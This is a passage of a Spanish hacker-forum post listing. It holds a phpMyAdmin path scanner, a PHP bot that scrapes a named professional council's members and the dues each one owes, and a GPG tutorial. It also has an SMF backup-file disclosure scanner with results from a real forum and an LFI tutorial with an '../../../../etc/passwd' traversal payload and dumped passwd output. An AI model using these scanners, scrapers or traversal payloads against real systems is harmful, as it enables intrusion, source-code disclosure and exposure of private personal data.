'/phpMyAdmin-2.6.1/''/phpMyAdmin-2.6.1-pl1/''/phpMyAdmin-2.6.1-pl2/''/phpMyAdmin-2.6.1-pl3/','/phpMyAdmin-2.6.2-rc1/'
                                   
'/phpMyAdmin-2.6.2-beta1/''/phpMyAdmin-2.6.2-rc1/''/phpMyAdmin-2.6.2/''/phpMyAdmin-2.6.2-pl1/''/phpMyAdmin-2.6.3/'
                                   
'/phpMyAdmin-2.6.3-rc1/''/phpMyAdmin-2.6.3/''/phpMyAdmin-2.6.3-pl1/''/phpMyAdmin-2.6.4-rc1/''/phpMyAdmin-2.6.4-pl1/'
                                   
'/phpMyAdmin-2.6.4-pl2/''/phpMyAdmin-2.6.4-pl3/''/phpMyAdmin-2.6.4-pl4/''/phpMyAdmin-2.6.4/''/phpMyAdmin-2.7.0-beta1/'
                                   
'/phpMyAdmin-2.7.0-rc1/''/phpMyAdmin-2.7.0-pl1/''/phpMyAdmin-2.7.0-pl2/''/phpMyAdmin-2.7.0/''/phpMyAdmin-2.8.0-beta1/'
                                   
'/phpMyAdmin-2.8.0-rc1/''/phpMyAdmin-2.8.0-rc2/''/phpMyAdmin-2.8.0/''/phpMyAdmin-2.8.0.1/''/phpMyAdmin-2.8.0.2/''/phpMyAdmin-2.8.0.3/'
                                   
'/phpMyAdmin-2.8.0.4/''/phpMyAdmin-2.8.1-rc1/''/phpMyAdmin-2.8.1/''/phpMyAdmin-2.8.2/''/sqlmanager/''/mysqlmanager/''/p/m/a/',
                                   
'/PMA2005/''/pma2005/''/phpmanager/''/php-myadmin/''/phpmy-admin/''/webadmin/''/sqlweb/''/websql/''/webdb/''/mysqladmin/'
   '/mysql-admin/','/mya/','/robots.txt','/phpinfo.php',
  );
 echo '<div id="resultados">';
 echo '<table>';
  foreach($list as $path => $test
{
                                         
$ch curl_init();
                                         
curl_setopt($chCURLOPT_RETURNTRANSFER1);
                                         
curl_setopt($chCURLOPT_HEADER1);
                                         
curl_setopt($chCURLOPT_URL$target.$test);
                                         
$pma curl_exec($ch);
 curl_close($ch);
 if (preg_match("/200 OK/"$pma))
{
echo '<tr><td class="resultados ">';
    ob_flush();
echo '[!] <a href="'.$target.$test.'" target="_blank">'.$target.$test.'</a>';
flush();
echo '</td></tr>';
}
 }
echo '</table>';
echo '</div><br>';
                     echo 
'<div id="resultados">';
                     echo 
'<td class="resultados ">Analisis Finalizado. <a href="'.$_SERVER['PHP_SELF'].'">¿Deseas chequear otro sitio?</a></td>';
 echo '</div>';
                     }
                     else
{
 echo '<div id="resultados">';
                         echo 
'¡No es posible establecer conexion con el sitio!<br><td class="resultados "><a href="'.$_SERVER['PHP_SELF'].'">¿Deseas chequear otro sitio?</a></td>
   </div>'
;
                        }
 }
?>

</div>
</center>
</body>
</html>

16
Redes y antenas / Armado de cables de red
« en: Febrero 22, 2013, 04:05:31 pm »
Si usamos cable de categoría 5/5e o categoría 6, lo podremos usar para Fast Ethernet (100Mbps) según el estándar 100BASE-TX del nivel física Ethernet y para Gigabit Ethernet (1Gbps) según el estándar 1000BASE-T.

Según el estándar TIA/EIA-568-B hay dos posibilidades para hacer corresponder cada cable según su color con cada pin del conector RJ45: Tenemos el cableado T568A y el cableado T568B. Normalmente haremos cables usando la misma correspondencia en ambos extremos, pero si queremos hacer un cable cruzado para Fast Ethernet, tenemos que hacer un cable con T568A en un extremo y con T568B en el otro. Como Fast Ethernet sólo usa dos pares (el de TX y el de RX), lo que estamos haciendo es unir el TX de un sistema con el RX del otro sistema y dejar el resto de pares sin cruzar (marrón, blanco-marrón y azul, blanco-azul).



Cables normales T568A y T568B:





Cables cruzados T568A y T568B (son exactamente iguales):





Hay que tener en cuenta que Gigabit Ethernet usa los cuatro pares, no sólo dos. Por eso, si queremos hacer un cable cruzado para Gigabit tenemos que cruzar todos los pares:





Ya que conocemos las normas, dejo un vídeo para que sepan como es el correcto armado del mismo!


17
Seguridad / Web Scraping
« en: Febrero 22, 2013, 04:03:39 pm »
Hoy voy a comentar algo que me gusta mucho: “Web Scraping” o como seria en español: “El raspado web” esta técnica se utiliza mucho en lo que refiere a la implementacion “Algorithmic Tradings”

Antes de ver un par de lineas de código, voy a dejar una breve y muy pobre descripción de lo que a mi entender (corto  ) viene a ser el Web Scraping.

Raspado Web (recolección en la web o la extracción de datos web) es una técnica de software de extracción de información de sitios web . Por lo general, este tipo de programas de software de simulación de la exploración humana de la World Wide Web , ya sea siguiendo bajo nivel de transferencia de hipertexto (HTTP), e incorporación de un navegador web en toda regla, como por ejemplo Internet Explorer o Mozilla Firefox-

El “Web Scraping” se centra más en la transformación de los datos no estructurados en la Web, por lo general en formato HTML , en datos estructurados que pueden ser almacenados (o no) y analizados en una base de datos central local o de hoja de cálculo. También está relacionada con la automatización web, que simula la navegación humana utilizando software informático. Incluyen la comparación de precios en línea, seguimiento de datos de tiempo, detección de cambios en sitio web, investigación, mashup web, entre una larga lista de etcéteras

Técnicas:

Humanos copiando y pegando a mano.
Robots de texto y expresiones regulares.
Programación HTTP.
Algoritmos de minería de datos.
Análisis de DOM.
Analizadores HTML.

En mi caso y por un gusto en particular elijo el de robots de texto y expresiones regulares  con PHP, lenguaje que me encanta y ademas me parece muy sencillo

Dejo un script que prepare como Prueba de Concepto de lo citado arriba… La web que se presta para este tipo de técnica es “El Consejo Profesional de Ciencias Informática de Catamarca”.



El script en resumen lo que se encarga de hacer es listar la cantidad de matriculados que hay, y al mismo tiempo realiza una consulta (en la misma web) dejando en evidencia la cantidad de cuotas que cada matriculado adeuda, cosa que debería ser privado.
Me llama la atención que este mismo Consejo es el que esta en contra de el “Ejercicio Ilegal” por no estar matriculado ( o recibido) pero los mismo a mi parecer no demuestran conocimiento alguno como para poder decir quien puede o no trabajar, a pesar de que dicten cursos de seguridad y traigan disertantes, parece que no aprendieron nada de lo intentan fomentar…

Lo que me preocupa es si cumplen con la ley que establece el Registro Nacional de Base de Datos para que las entidades que poseen información en la nube, resguarden estos datos.
Si alguien quiere saber lo que dice la ley: Registro Nacional de Bases de Datos

Por ultimo les comparto un enlace sobre la matriculación obligatoria que me gustaria que todos se den un tiempo para leer:

Articulo: Sobre la matriculación obligatoria en informática

Código Fuente CPCICAT-BOT

Código: [Seleccionar]
<!DOCTYPE html>
<html>
  <head>
  <style type="text/css">
  body{
color: #FFF;
background-color: #000;
}


  </style>
  </head>
<body>
<title>Web Scraping - CPCICAT_BOT</title>

 
<?php
ini_set
('user_agent''Mozilla/5.0 (Windows; U; Windows NT 6.0; en-GB; rv:1.9.0.3) Gecko/2008092417 Firefox/3.0.3');
$cantidad_center = (int) $cantidad_center;
$listado "http://www.cpcicat.org.ar/listado-de-matriculados.html"// URL de donde obtengo los nombres e ids de los matriculados.
$cupones "http://www.cpcicat.org.ar/scripts/pagos/cupon.php?socio="// URL donde hare la consulta de lo que adeudan.
$codigo_fuente_listado file_get_contents($listado);
$codigo_fuente_listado utf8_decode($codigo_fuente_listado);
$quito_tag_tbody explode('<tbody>',$codigo_fuente_listado);
$quito_tag_tbody explode('</tbody>',$quito_tag_tbody[1]);

$ids_center explode('<td style="text-align: center">'$quito_tag_tbody[0]);
$cantidad_center count($ids_center);

$explode_tds explode('</td><td>',$quito_tag_tbody[0]);
$i=1;
for(
$x=1;$x<270;$x++)
{
ob_flush();
echo '<font color="#666">Nombre y Apellido:</font> '.$explode_tds[$x];
$explode_limpia explode('</td><td style="text-align: center">',$explode_tds[$x+1]);
echo " ".$explode_limpia[0]." ";
$x $x+1;
$adeuda $cupones.$i;
$fuente_deuda file_get_contents($adeuda);
$explodeo_deuda explode('<form>',$fuente_deuda);
$explodeo_deuda explode('<select name="users" onchange="mostrarMonto('.$i.', this.value)">',$explodeo_deuda[1]);
$explodeo_deuda str_replace('Ud. adeuda','',$explodeo_deuda);
echo '<font color="#666">Adeuda: </font>'.$explodeo_deuda[0]."<br>";
$i++;
flush();
}


?>


18
Seguridad / Implementar GPG en Gmail con el add-on Mymail-Crypt
« en: Febrero 21, 2013, 03:09:13 pm »
GPG es estable, calificado como un software para el uso en producción y es comúnmente incluido en los sistemas operativos como FreeBSD, OpenBSD, NetBSD y últimamente con todas las distribuciones GNU/Linux.

GPG cifra los mensajes usando pares de claves individuales asimétricas generadas por los usuarios. Las claves públicas pueden ser compartidas con otros usuarios de muchas maneras, un ejemplo de ello es depositándolas en los servidores de claves. Siempre deben ser compartidas cuidadosamente para prevenir falsas identidades por la corrupción de las claves públicas. También es posible añadir una firma digital criptográfica a un mensaje, de esta manera la totalidad del mensaje y el remitente pueden ser verificados en caso de que se desconfíe de una correspondencia en particular.
GnuPG también soporta algoritmos de cifrado simétricos, por ejemplo CASTS.
GPG no usa algoritmos de software que están restringidos por patentes, entre estos se encuentra el algoritmo de cifrado IDEA que está presente en PGP casi desde sus inicios. En su lugar usa una serie de algoritmos no patentados como ElGamal, CAST5, Triple DES (3DES), AES y Blowfish. También es posible usar IDEA en GPG descargando un plugin extra, sin embargo este puede requerir una licencia para usuarios de algunos países en donde esté patentada IDEA.
GPG es un software de cifrado híbrido que usa una combinación convencional de criptografía de claves simétricas para la rapidez y criptografía de claves públicas para el fácil compartimiento de claves seguras, típicamente usando recipientes de claves públicas para cifrar una clave de sesión que es usada una vez. Este modo de operación es parte del estándar OpenPGP y ha sido parte del PGP desde su primera versión.

Lo primero que debemos hacer para poder utilizar GPG de manera sencilla y rapida en nuestros mails es instalar en Chrome el Add-on (extension) Mymail-Crypt



Una vez hecho eso vamos a crear nuestras llaves (publica y privada)



Completamos con los datos que solicita




Una vez creada ya podemos ver las llaves privadas que tenemos en uso.



Tambien podemos ver la llave publica (que es la que debemos entregar a nuestros amigos para que se puedan comunicar con nosotros)
Donde dice insert public key, debemos de ingresar la de nuestros conocidos para poder comunicarnos con ellos  [moquito]



La debemos guardar en un documento con extension .asc y con el nombre de la casilla de correo: ejemplo staff.remoteexecution.asc



Para muestra basta y sobra un boton, asi que ahora lo que hacemos es escribir el mail y luego poner la contraseña que se nos solicito que pusieramos en la configuracion del Add-on



De esa manera queda firmado y encryptado el mensaje en cuestion.



Por lo tanto la unica manera de que alguien conozca el contenido de el mail, sera solo porque hemos compartido llave publica.



Y para descifrarlo solo debe ingresar el password y darle en decrypt


19
Back-end / SMF Source Code Disclosure Seeker
« en: Septiembre 02, 2011, 12:20:11 pm »
Esta tool no se si sera muy util pero por las dudas me tome el tiempo de hacerla, mas que nada sirve para ver los archivos temporales que fueron creados cuando se instalan nuevos modulos en el sistema de smf. Les dejo el codigo.

Código: PHP
  1. <html>
  2. <title>SMF Source Code Disclosure Seeker</title>
  3. <style type="text/css">
  4. body{
  5.     background: #000;
  6.     color: #FFF;
  7.     }
  8. a:visited{
  9.          color:#FFF;
  10.          text-decoration: none;
  11.          }
  12. a:link{
  13.          color:#FFF;
  14.          text-decoration: none;
  15.          }
  16. a:hover{
  17.          color:#FF0000;
  18.          text-decoration: blink;
  19.          }
  20. input,option{
  21.      font-family: verdana, sans-serif;
  22.      font-size: 16pt;
  23.      border: gray 2px solid;
  24.      }            
  25. #links{
  26.        margin:0 auto;
  27.        width:860px;
  28.        border-color: #E8E8E8;
  29.        text-align: right;
  30.        }
  31. </style>
  32. <body>
  33. <div id="links">
  34. <center>
  35. <img src="http://www.0x3a.com.ar/img/logo.png"/><br/>
  36. <form action ="" method="post">
  37. URL : <input type ="text" name="site" size="50"/>
  38. <input type = "submit" value="Test!" />
  39. </form>
  40. <?php
  41. /**
  42.  *
  43.  *
  44.  * @author Daniel Godoy
  45.  * @copyright 2011
  46.  * @Site www.0x3a.com.ar www.remoteexecution.com.ar www.delincuentedital.com.ar
  47.  *
  48.  *  This program is free software: you can redistribute it and/or modify
  49.  *  it under the terms of the GNU General Public License as published by
  50.  *  the Free Software Foundation, either version 3 of the License, or
  51.  *  (at your option) any later version.
  52.  *
  53.  *  This program is distributed in the hope that it will be useful,
  54.  *  but WITHOUT ANY WARRANTY; without even the implied warranty of
  55.  *  MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
  56.  *  GNU General Public License for more details.
  57.  *
  58.  *  You should have received a copy of the GNU General Public License
  59.  *  along with this program.  If not, see <http://www.gnu.org/licenses/>.
  60.  *
  61.  *
  62.  **/
  63. $site = $_POST['site'];
  64. $list = array('index.php~', 'Settings.php~','Settings_bak.php~','/Sources/Admin.php~','/Sources/BoardIndex.php~','/Sources/Calendar.php~','/Sources/Display.php~',
  65.               '/Sources/Errors.php~','/Sources/DumpDatabase.php~','/Sources/Help.php~','/Sources/index.php~','/Sources/Karma.php~','/Sources/Load.php~',
  66.               '/Sources/LockTopic.php~','/Sources/LogInOut.php~','/Sources/ManageAttachments.php~','/Sources/ManageBans.php~','/Sources/ManageBoards.php~',
  67.               '/Sources/ManageCalendar.php~','/Sources/ManageErrors.php~','/Sources/ManageMembergroups.php~','/Sources/ManageMembers.php~',
  68.               '/Sources/ManageNews.php~','/Sources/ManagePermissions.php~','/Sources/ManagePosts.php~','/Sources/ManageRegistration.php~',
  69.               '/Sources/ManageSearch.php~','/Sources/ManageServer.php~','/Sources/ManageShoutbox.php~','/Sources/ManageSmileys.php~','/Sources/Memberlist.php~',
  70.               '/Sources/MessageIndex.php~','/Sources/Memberlist.php~','/Sources/MessageIndex.php~','/Sources/Modlog.php~','/Sources/ModSettings.php~',
  71.               '/Sources/MoveTopic.php~','/Sources/News.php~','/Sources/Notify.php~','/Sources/PackageGet.php~','/Sources/Packages.php~','/Sources/PersonalMessage.php~',
  72.               '/Sources/Poll.php~','/Sources/Post.php~','/Sources/Printpage.php~','/Sources/Profile.php~','/Sources/QueryString.php~','/Sources/Recent.php~',
  73.               '/Sources/Register.php~','/Sources/Reminder.php~','/Sources/RemoveTopic.php~','/Sources/RepairBoards.php~','/Sources/Reports.php~','/Sources/Search.php~',
  74.               '/Sources/Security.php~','/Sources/SendTopic.php~','/Sources/Shoutbox.php~','/Sources/SplitTopics.php~','/Sources/Stats.php~',
  75.               '/Sources/Subs-Auth.php~','/Sources/Subs-Boards.php~','/Sources/Subs-Charset.php~','/Sources/Subs-Compat.php~','/Sources/Subs-Graphics.php~',
  76.               '/Sources/Subs-Members.php~','/Sources/Subs-Package.php~','/Sources/Subs-Post.php~','/Sources/Subs-Shoutbox.php~','/Sources/Subs-Sound.php~',
  77.               '/Sources/Subs.php~','/Sources/Themes.php~','/Sources/ViewQuery.php~','/Sources/Who.php~','/Themes/default/Admin.template.php~',
  78.               '/Themes/default/BoardIndex.template.php~','/Themes/default/Calendar.template.php~','/Themes/default/Combat.template.php~',
  79.               '/Themes/default/Display.template.php~','/Themes/default/Errors.template.php~','/Themes/default/Help.template.php~','/Themes/default/index.php~',
  80.               '/Themes/default/index.template.php~','/Themes/default/Login.template.php~','/Themes/default/ManageAttachments.template.php~',
  81.               '/Themes/default/ManageBans.template.php~','/Themes/default/ManageBoards.template.php~','/Themes/default/ManageCalendar.template.php~',
  82.               '/Themes/default/ManageMembergroups.template.php~','/Themes/default/ManageMembers.template.php~','/Themes/default/ManageNews.template.php~',
  83.               '/Themes/default/ManagePermissions.template.php~','/Themes/default/ManageSearch.template.php~','/Themes/default/ManageShoutbox.template.php~',
  84.               '/Themes/default/ManageSmileys.template.php~','/Themes/default/Memberlist.template.php~','/Themes/default/MessageIndex.template.php~',
  85.               '/Themes/default/Modlog.template.php~','/Themes/default/MoveTopic.template.php~','/Themes/default/Notify.template.php~',
  86.               '/Themes/default/Packages.template.php~','/Themes/default/PersonalMessage.template.php~','/Themes/default/Poll.template.php~',
  87.               '/Themes/default/Post.template.php~','/Themes/default/Printpage.template.php~','/Themes/default/Profile.template.php~',
  88.               '/Themes/default/Recent.template.php~','/Themes/default/Register.template.php~','/Themes/default/Reminder.template.php~',
  89.               '/Themes/default/Reports.template.php~','/Themes/default/Search.template.php~','/Themes/default/SendTopic.template.php~','/Themes/default/Settings.template.php~',
  90.               '/Themes/default/Shoutbox.template.php~','/Themes/default/SplitTopics.template.php~','/Themes/default/Stats.template.php~',
  91.               '/Themes/default/Themes.template.php~','/Themes/default/Who.template.php~','/Themes/default/Wireless.template.php~','/Themes/default/Xml.template.php~',
  92.               '/Themes/default/languages/Admin.english.php~','/Themes/default/languages/Admin.spanish_latin.php~','/Themes/default/languages/Errors.english.php~',
  93.               '/Themes/default/languages/Errors.spanish_latin.php~','/Themes/default/languages/Help.english.php~','/Themes/default/languages/Help.spanish_latin.php~',
  94.               '/Themes/default/languages/index.english.php~','/Themes/default/languages/index.spanish_latin.php~','/Themes/default/languages/Install.english.php~',
  95.               '/Themes/default/languages/Install.spanish_latin.php~','/Themes/default/languages/Login.english.php~','/Themes/default/languages/Login.spanish_latin.php~',
  96.               '/Themes/default/languages/ManageBoards.english.php~','/Themes/default/languages/ManageBoards.spanish_latin.php~','/Themes/default/languages/ManageCalendar.english.php~',
  97.               '/Themes/default/languages/ManageCalendar.spanish_latin.php~','/Themes/default/languages/ManageMembers.english.php~','/Themes/default/languages/ManageMembers.spanish_latin.php~',
  98.               '/Themes/default/languages/ManagePermissions.english.php~','/Themes/default/languages/ManagePermissions.spanish_latin.php~','/Themes/default/languages/ManageSmileys.english.php~',
  99.               '/Themes/default/languages/ManageSmileys.spanish_latin.php~','/Themes/default/languages/Manual.english.php~','/Themes/default/languages/Manual.spanish_latin.php~',
  100.               '/Themes/default/languages/Modifications.english.php~','/Themes/default/languages/ManageSmileys.spanish_latin.php~','/Themes/default/languages/Manual.english.php~',
  101.               '/Themes/default/languages/Manual.spanish_latin.php~','/Themes/default/languages/Modifications.english.php~','/Themes/default/languages/Modifications.spanish_latin.php~',
  102.               '/Themes/default/languages/ModSettings.english.php~','/Themes/default/languages/ModSettings.spanish_latin.php~','/Themes/default/languages/Packages.english.php~',
  103.               '/Themes/default/languages/Packages.spanish_latin.php~','/Themes/default/languages/PersonalMessage.english.php~','/Themes/default/languages/PersonalMessage.spanish_latin.php~',
  104.               '/Themes/default/languages/Post.english.php~','/Themes/default/languages/Post.spanish_latin.php~','/Themes/default/languages/Profile.english.php~',
  105.               '/Themes/default/languages/Profile.spanish_latin.php~','/Themes/default/languages/Reports.english.php~','/Themes/default/languages/Reports.spanish_latin.php~',
  106.               '/Themes/default/languages/Search.english.php~','/Themes/default/languages/Search.spanish_latin.php~','/Themes/default/languages/Settings.english.php~',
  107.               '/Themes/default/languages/Settings.spanish_latin.php~','/Themes/default/languages/Shoutbox.english.php~','/Themes/default/languages/Stats.english.php~',
  108.               '/Themes/default/languages/Stats.spanish_latin.php~','/Themes/default/languages/Themes.english.php~','/Themes/default/languages/Themes.spanish_latin.php~',
  109.               '/Themes/default/languages/Who.english.php~','/Themes/default/languages/Who.spanish_latin.php~','/Themes/default/languages/Wireless.english.php~',
  110.               '/Themes/default/languages/Wireless.spanish_latin.php~',              
  111.              );
  112.  
  113. if(isset($site)){
  114.                 foreach($list as $path => $test) {
  115.                                                  $ch = curl_init();
  116.                                                  curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  117.                                                  curl_setopt($ch, CURLOPT_HEADER, 1);
  118.                                                  curl_setopt($ch, CURLOPT_URL, $site.$test);
  119.                                                  $result = curl_exec($ch);
  120.                                                  curl_close($ch);
  121. if (preg_match("/200 OK/", $result)){
  122.                                     flush();
  123.                                     echo '<br/>[!] <a href="'.$site.$test.'" target="_blank">'.$site.$test.'</a>';
  124.                                     ob_flush();
  125.                                     }
  126.                                    
  127.                                  
  128.                                                 }      
  129.                 }
  130.  
  131. ?>
  132. </center>
  133. </div>
  134. </body>
  135. </html>
  136.  

Ejemplo obtenido al correr el script.

[!] http://forums.fireworknk.com/index.php~
[!] http://forums.fireworknk.com//Sources/BoardIndex.php~
[!] http://forums.fireworknk.com//Sources/Load.php~
[!] http://forums.fireworknk.com//Sources/ManageBoards.php~
[!] http://forums.fireworknk.com//Sources/ManagePermissions.php~
[!] http://forums.fireworknk.com//Sources/ManagePosts.php~
[!] http://forums.fireworknk.com//Sources/ManageRegistration.php~
[!] http://forums.fireworknk.com//Sources/ManageSearch.php~
[!] http://forums.fireworknk.com//Sources/Modlog.php~
[!] http://forums.fireworknk.com//Sources/ModSettings.php~
[!] http://forums.fireworknk.com//Sources/PersonalMessage.php~
[!] http://forums.fireworknk.com//Sources/Post.php~
[!] http://forums.fireworknk.com//Sources/Profile.php~
[!] http://forums.fireworknk.com//Sources/Recent.php~
[!] http://forums.fireworknk.com//Sources/Register.php~
[!] http://forums.fireworknk.com//Sources/Search.php~
[!] http://forums.fireworknk.com//Sources/Subs-Boards.php~
[!] http://forums.fireworknk.com//Sources/Subs-Graphics.php~
[!] http://forums.fireworknk.com//Sources/Subs-Members.php~
[!] http://forums.fireworknk.com//Sources/Subs.php~
[!] http://forums.fireworknk.com//Sources/Who.php~
[!] http://forums.fireworknk.com//Themes/default/Admin.template.php~
[!] http://forums.fireworknk.com//Themes/default/BoardIndex.template.php~
[!] http://forums.fireworknk.com//Themes/default/Display.template.php~
[!] http://forums.fireworknk.com//Themes/default/index.template.php~
[!] http://forums.fireworknk.com//Themes/default/ManageBoards.template.php~
[!] http://forums.fireworknk.com//Themes/default/ManageSearch.template.php~
[!] http://forums.fireworknk.com//Themes/default/Modlog.template.php~
[!] http://forums.fireworknk.com//Themes/default/PersonalMessage.template.php~
[!] http://forums.fireworknk.com//Themes/default/Post.template.php~
[!] http://forums.fireworknk.com//Themes/default/Profile.template.php~
[!] http://forums.fireworknk.com//Themes/default/Register.template.php~
[!] http://forums.fireworknk.com//Themes/default/Search.template.php~
[!] http://forums.fireworknk.com//Themes/default/languages/Errors.english.php~
[!] http://forums.fireworknk.com//Themes/default/languages/Help.english.php~
[!] http://forums.fireworknk.com//Themes/default/languages/Login.english.php~
[!] http://forums.fireworknk.com//Themes/default/languages/Modifications.english.php~
[!] http://forums.fireworknk.com//Themes/default/languages/Modifications.english.php~
[!] http://forums.fireworknk.com//Themes/default/languages/ModSettings.english.php~
[!] http://forums.fireworknk.com//Themes/default/languages/Who.english.php~

20
Pentesting / Local File Inclusion
« en: Agosto 27, 2011, 08:39:31 pm »
Este paper lo escribí hace como 4 años mas o menos  O_O
Es algo básico pero creo que se entiende el concepto bastante bien.
[LFI]Local File Inclusion
Es un exploit que permite incluir archivos locales, como por ejemplo /etc/passwd <--- es el que se utiliza para probar si se puede explotar el sitio es vulnerable a lfi. un ejemplo vulnerable a LFI seria.

Código: [Seleccionar]
<?php
$page 
$_GET['page'];
include(
$page);
?>


$_GET es el metodo que utilizamos para recoger los valores o variables introducidas por el usuario, y se veria algo asi
Código: [Seleccionar]
view.php?file=EntradaUsuario
el resultado seria algo asi http://127.0.0.1/file.php?file=EntradaUsuario
esto incluria lo que el usuario le indica... es decir el archivo existente en la pagina actual. ahora teniendo un poco de concomiento acerca de como se produce el lfi Vamos a probar si entendimos los conceptos. http://192.192.6.123/~lu/view.php?file=../../../../etc/passwd Esto debe incluir el archivo /etc/passwd en la página actual. El'../' significa subir un directorio. (seguro que si alguien uso dreamweaver le resultara familiar, a la hora de indicar donde se encuentra los archivos de la pagina) por lo general los directorios esta distribuidos de este modo "/home/nombredelhost/sitios/www.pagina.com/" y el archivo vulnerable (view.php)se encuentra en "/home/nombredelhost/sitios/www.pagina.com/file.php". como se imaginan /home/ es un directorio, /nombre del host/ es directorio, /sitios/ es directorio y /www.pagina.com/ tambien, lo que nos que hacer es ir al directorio raíz "/" en donde recine podremos tener acceso a /etc/Passwd Por lo tanto, en la url, para incluir el archivo /etc/passwd retrocedemos 4 directorios: ../../../../etc/passwd NOTA: si open_basedirrestriction estuviese desactivado este bug no funciona ya que solo permite incluir archivos ende su sitio y no del servidor.
Código: [Seleccionar]
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
lp:x:4:7:lp:/var/spool/lpd:/sbin/nologin
sync:x:5:0:sync:/sbin:/bin/sync
shutdown:x:6:0:shutdown:/sbin:/sbin/shutdown
halt:x:7:0:halt:/sbin:/sbin/halt
mail:x:8:12:mail:/var/spool/mail:/sbin/nologin
news:x:9:13:news:/etc/news:
uucp:x:10:14:uucp:/var/spool/uucp:/sbin/nologin
operator:x:11:0:operator:/root:/sbin/nologin
games:x:12:100:games:/usr/games:/sbin/nologin
gopher:x:13:30:gopher:/var/gopher:/sbin/nologin
ftp:x:14:50:FTP User:/var/ftp:/sbin/nologin
nobody:x:99:99:Nobody:/:/sbin/nologin
rpm:x:37:37::/var/lib/rpm:/sbin/nologin
vcsa:x:69:69:virtual console memory
owner:/dev:/sbin/nologin nscd:x:28:28:NSCD
Daemon:/:/sbin/nologin sshd:x:74:74:Privilege-separated
SSH:/var/empty/sshd:/sbin/nologin
rpc:x:32:32:Portmapper RPC user:/:/sbin/nologin
rpcuser:x:29:29:RPC Service User:/var/lib/nfs:/sbin/nologin
nfsnobody:x:65534:65534:Anonymous
NFS User:/var/lib/nfs:/sbin/nologin
mailnull:x:47:47::/var/spool/mqueue:/sbin/nologin
smmsp:x:51:51::/var/spool/mqueue:/sbin/nologin
pcap:x:77:77::/var/arpwatch:/sbin/nologin
mysql:x:500:500::/home/mysql:/sbin/nologin
postgres:x:501:501::/home/postgres:/bin/bash
mailadm:x:502:502::/home/mailadm:/sbin/nologin
webmail:x:503:503::/home/webmail:/bin/bash
lu:x:504:504::/home/lu:/bin/bash
public:x:505:506::/home/www/publicpage:/bin/bash
stu:x:506:508::/home1/stu:/bin/bash


Páginas: [1] 2